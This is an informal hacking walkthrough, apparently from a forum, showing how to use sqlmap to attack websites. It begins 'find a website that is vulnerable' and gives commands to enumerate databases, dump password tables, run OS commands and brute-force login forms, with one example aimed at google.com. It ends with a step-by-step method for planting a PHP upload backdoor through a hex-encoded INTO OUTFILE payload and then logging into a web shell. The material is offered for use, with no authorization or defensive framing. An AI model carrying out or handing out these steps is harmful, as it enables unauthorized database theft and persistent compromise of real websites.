How to use SQLMAP

Hello this is a SQLMAP Walkthrough for L33TZone.org writen by AnonymousFigure



How to use sqlmap

First find a website that is vulnerable



sqlmap -u http://192.168.83.132/cat.php?id=1 --dbs 

(to go to first database)





sqlmap -u http://192.168.83.132/cat.php?id=1 -D (table-name) --tables

(to go tables)




sqlmap -u http://192.168.83.132/cat.php?id=1 -D (table-name) -T (column-name) --columns

(see columns)




sqlmap -u http://192.168.83.132/cat.php?id=1 -D (table-name) -T (column-name) -C (user_pass) --dump




Or you can just dump the passwords first try.


sqlmap -u http://192.168.83.132/cat.php?id=1 --passwords




Sign in how to


mysql -u username -p -h 192.168.1.1



Other ways to use SQLMAP


sqlmap -u www.google.com/php.id=15 --current-user --is-dba

sqlmap -u www.google.com/php.id=15 --os-cmd -v 1


Dump it all


sqlmap -u 192.168.1.1 --forms --dump-all


Hit that login with sql injection


sqlmap -u "http://192.168.83.134/index.php" --dbms=MySQL --dump --data "uname=test&psw=pass" --level=5 --risk=3


Upload a php-shell with sqlmap


1. After finding a vulnerable site you need to get Full Path Disclosure^

I will use the empty array exploit, add the brackets []

Code: [Select]

http://www.example.com/index.php?id[]=1

gives

Code: [Select]

Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59

now we have the path


2. now you need to convert your upload script to hex^

Code: [Select]

<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

becomes

Code: [Select]

3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e


3. Now lets fire up sqlmap with a sql-shell and inject

Code: [Select]

python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell

let sqlmap do its magic and after a while you will get a sql-shell

Quote

[15:35:06] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.3.5, Apache 2.2.17

back-end DBMS: MySQL 5

[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell>

now write

SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";

don't forget the 0x before your hex, so it soul look like

Code: [Select]

select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e

into "/home/relax/public_html/upload.php";

After a few seconds you should get a confirmation if it was successful or not


4. browse to http://www.example.com/upload.php and upload the php shell


5. browse to your php shell and login

Last modified: Tuesday, 8 March 2016, 9:09 AM